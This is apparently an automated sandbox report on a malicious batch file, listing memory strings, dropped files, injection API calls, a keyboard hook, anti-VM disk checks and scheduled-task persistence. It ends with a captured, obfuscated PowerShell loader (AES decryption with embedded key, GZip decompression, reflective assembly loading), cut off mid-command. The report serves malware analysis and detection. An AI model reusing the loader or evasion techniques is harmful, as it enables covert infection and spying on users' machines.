Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.
Source: lsass.exe, 00000009.00000003.2240150691.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3549489785.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2607196609.00000140AE19E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 0000001D.00000002.3545016604.000001A204EE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000009.00000000.2134285461.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3528269548.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000009.00000002.3555641762.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2186869203.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135605557.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135420656.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3553913064.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000001C.00000002.3557370304.00000240B2DD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: svchost.exe, 00000025.00000002.3601953050.000001E709ED9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000000.2298743964.000001E709ED9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp, Null.6.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64AJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Jump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187Jump to dropped file

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: NhoqAfkhHL.batStatic file information: 7301955
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\qVrKPA.exeJump to dropped file
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,7_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858982C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,8_2_000001E858982C80
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE8627E8 NtQueryDirectoryFileEx,GetFileType,StrCpyW,9_2_00000140AE8627E8
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE862300 NtQuerySystemInformation,StrCmpNIW,9_2_00000140AE862300
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB32C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,15_2_000001160CB32C80
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD02518 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,20_2_000001428DD02518
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-gykiBRcPJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\qVrKPA.exe
Source: C:\Windows\System32\svchost.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140001CF07_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002D4C7_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400031D07_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400012747_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_00000001400024347_2_0000000140002434
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001E85895CE188_3_000001E85895CE18
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001E85895CC948_3_000001E85895CC94
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001E8589523F08_3_000001E8589523F0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898DA188_2_000001E85898DA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898D8948_2_000001E85898D894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858982FF08_2_000001E858982FF0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589BDA188_2_000001E8589BDA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589BD8948_2_000001E8589BD894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589B2FF08_2_000001E8589B2FF0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589EDA188_2_000001E8589EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589ED8948_2_000001E8589ED894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589E2FF08_2_000001E8589E2FF0
Source: C:\Windows\System32\lsass.exeCode function: 9_3_00000140ADFCCE189_3_00000140ADFCCE18
Source: C:\Windows\System32\lsass.exeCode function: 9_3_00000140ADFCCC949_3_00000140ADFCCC94
Source: C:\Windows\System32\lsass.exeCode function: 9_3_00000140ADFC23F09_3_00000140ADFC23F0
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE862FF09_2_00000140AE862FF0
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86D8949_2_00000140AE86D894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86DA189_2_00000140AE86DA18
Source: C:\Windows\System32\svchost.exeCode function: 12_3_00000195DD59CC9412_3_00000195DD59CC94
Source: C:\Windows\System32\svchost.exeCode function: 12_3_00000195DD5923F012_3_00000195DD5923F0
Source: C:\Windows\System32\svchost.exeCode function: 12_3_00000195DD59CE1812_3_00000195DD59CE18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5CD89412_2_00000195DD5CD894
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5C2FF012_2_00000195DD5C2FF0
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5CDA1812_2_00000195DD5CDA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1ADA1812_2_00000195DE1ADA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1A2FF012_2_00000195DE1A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1AD89412_2_00000195DE1AD894
Source: C:\Windows\System32\cmd.exeCode function: 13_3_00000192913BCC9413_3_00000192913BCC94
Source: C:\Windows\System32\cmd.exeCode function: 13_3_00000192913B23F013_3_00000192913B23F0
Source: C:\Windows\System32\cmd.exeCode function: 13_3_00000192913BCE1813_3_00000192913BCE18
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913ED89413_2_00000192913ED894
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913E2FF013_2_00000192913E2FF0
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913EDA1813_2_00000192913EDA18
Source: C:\Windows\System32\cmd.exeCode function: 13_2_000001929162D89413_2_000001929162D894
Source: C:\Windows\System32\cmd.exeCode function: 13_2_0000019291622FF013_2_0000019291622FF0
Source: C:\Windows\System32\cmd.exeCode function: 13_2_000001929162DA1813_2_000001929162DA18
Source: C:\Windows\System32\conhost.exeCode function: 14_3_00000139F96A23F014_3_00000139F96A23F0
Source: C:\Windows\System32\conhost.exeCode function: 14_3_00000139F96ACE1814_3_00000139F96ACE18
Source: C:\Windows\System32\conhost.exeCode function: 14_3_00000139F96ACC9414_3_00000139F96ACC94
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96D2FF014_2_00000139F96D2FF0
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96DDA1814_2_00000139F96DDA18
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96DD89414_2_00000139F96DD894
Source: C:\Windows\System32\dwm.exeCode function: 15_3_000001160CD323F015_3_000001160CD323F0
Source: C:\Windows\System32\dwm.exeCode function: 15_3_000001160CD3CC9415_3_000001160CD3CC94
Source: C:\Windows\System32\dwm.exeCode function: 15_3_000001160CD3CE1815_3_000001160CD3CE18
Source: C:\Windows\System32\dwm.exeCode function: 15_3_000001160CB623F015_3_000001160CB623F0
Source: C:\Windows\System32\dwm.exeCode function: 15_3_000001160CB6CC9415_3_000001160CB6CC94
Source: C:\Windows\System32\dwm.exeCode function: 15_3_000001160CB6CE1815_3_000001160CB6CE18
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB32FF015_2_000001160CB32FF0
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB3D89415_2_000001160CB3D894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB3DA1815_2_000001160CB3DA18
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB92FF015_2_000001160CB92FF0
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB9D89415_2_000001160CB9D894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB9DA1815_2_000001160CB9DA18
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBC2FF015_2_000001160CBC2FF0
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBCD89415_2_000001160CBCD894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBCDA1815_2_000001160CBCDA18
Source: C:\Windows\System32\svchost.exeCode function: 19_3_00000257E107CC9419_3_00000257E107CC94
Source: C:\Windows\System32\svchost.exeCode function: 19_3_00000257E10723F019_3_00000257E10723F0
Source: C:\Windows\System32\svchost.exeCode function: 19_3_00000257E107CE1819_3_00000257E107CE18
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10AD89419_2_00000257E10AD894
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10A2FF019_2_00000257E10A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10ADA1819_2_00000257E10ADA18
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10DD89419_2_00000257E10DD894
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10D2FF019_2_00000257E10D2FF0
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10DDA1819_2_00000257E10DDA18
Source: C:\Windows\System32\svchost.exeCode function: 20_3_000001428DCDCE1820_3_000001428DCDCE18
Source: C:\Windows\System32\svchost.exeCode function: 20_3_000001428DCDCC9420_3_000001428DCDCC94
Source: C:\Windows\System32\svchost.exeCode function: 20_3_000001428DCD23F020_3_000001428DCD23F0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD0DA1820_2_000001428DD0DA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD0D89420_2_000001428DD0D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD02FF020_2_000001428DD02FF0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD3DA1820_2_000001428DD3DA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD3D89420_2_000001428DD3D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD32FF020_2_000001428DD32FF0
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001F28C1D23F021_3_000001F28C1D23F0
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001F28C1DCC9421_3_000001F28C1DCC94
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001F28C1DCE1821_3_000001F28C1DCE18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C93D89421_2_000001F28C93D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C932FF021_2_000001F28C932FF0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C93DA1821_2_000001F28C93DA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C96D89421_2_000001F28C96D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C962FF021_2_000001F28C962FF0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C96DA1821_2_000001F28C96DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000001CA97FD23F022_3_000001CA97FD23F0
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000001CA97FDCE1822_3_000001CA97FDCE18
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000001CA97FDCC9422_3_000001CA97FDCC94
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA9854D89422_2_000001CA9854D894
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA9854DA1822_2_000001CA9854DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA98542FF022_2_000001CA98542FF0
Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001D2652ECC9423_3_000001D2652ECC94
Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001D2652E23F023_3_000001D2652E23F0
Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001D2652ECE1823_3_000001D2652ECE18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26531D89423_2_000001D26531D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D265312FF023_2_000001D265312FF0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26531DA1823_2_000001D26531DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26534D89423_2_000001D26534D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D265342FF023_2_000001D265342FF0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26534DA1823_2_000001D26534DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000254A27CCE1824_3_00000254A27CCE18
Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000254A27C23F024_3_00000254A27C23F0
Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000254A27CCC9424_3_00000254A27CCC94
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D4DA1824_2_00000254A2D4DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D4D89424_2_00000254A2D4D894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D42FF024_2_00000254A2D42FF0
Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000024B87DACC9425_3_0000024B87DACC94
Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000024B87DA23F025_3_0000024B87DA23F0
Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000024B87DACE1825_3_0000024B87DACE18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DDD89425_2_0000024B87DDD894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DD2FF025_2_0000024B87DD2FF0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DDDA1825_2_0000024B87DDDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B8848DA1825_2_0000024B8848DA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B88482FF025_2_0000024B88482FF0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B8848D89425_2_0000024B8848D894
Source: C:\Windows\System32\svchost.exeCode function: 26_3_00000205FB3CCC9426_3_00000205FB3CCC94
Source: C:\Windows\System32\svchost.exeCode function: 26_3_00000205FB3C23F026_3_00000205FB3C23F0
Source: C:\Windows\System32\svchost.exeCode function: 26_3_00000205FB3CCE1826_3_00000205FB3CCE18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD40DA1826_2_00000205FD40DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD40D89426_2_00000205FD40D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD402FF026_2_00000205FD402FF0
Source: C:\Windows\System32\svchost.exeCode function: 29_3_000001A20567CE1829_3_000001A20567CE18
Source: C:\Windows\System32\svchost.exeCode function: 29_3_000001A20567CC9429_3_000001A20567CC94
Source: C:\Windows\System32\svchost.exeCode function: 29_3_000001A2056723F029_3_000001A2056723F0
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056ADA1829_2_000001A2056ADA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056AD89429_2_000001A2056AD894
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056A2FF029_2_000001A2056A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 30_3_0000018EC1F3CC9430_3_0000018EC1F3CC94
Source: C:\Windows\System32\svchost.exeCode function: 30_3_0000018EC1F323F030_3_0000018EC1F323F0
Source: C:\Windows\System32\svchost.exeCode function: 30_3_0000018EC1F3CE1830_3_0000018EC1F3CE18
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F6D89430_2_0000018EC1F6D894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F62FF030_2_0000018EC1F62FF0
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F6DA1830_2_0000018EC1F6DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_3_0000025CE3BCCE1831_3_0000025CE3BCCE18
Source: C:\Windows\System32\svchost.exeCode function: 31_3_0000025CE3BCCC9431_3_0000025CE3BCCC94
Source: C:\Windows\System32\svchost.exeCode function: 31_3_0000025CE3BC23F031_3_0000025CE3BC23F0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E0DA1831_2_0000025CE3E0DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E0D89431_2_0000025CE3E0D894
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E02FF031_2_0000025CE3E02FF0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE4172FF031_2_0000025CE4172FF0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE417D89431_2_0000025CE417D894
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE417DA1831_2_0000025CE417DA18
Source: qVrKPA.exe.28.drStatic PE information: No import functions for PE file found
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2175
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2173
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2175Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2173Jump to behavior
Source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@32/25@1/1
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,7_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,7_2_000000014000217C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\9ca1f38e-ee61-4c4c-beaf-9fc7674951a2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ro1ymda.0dm.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression 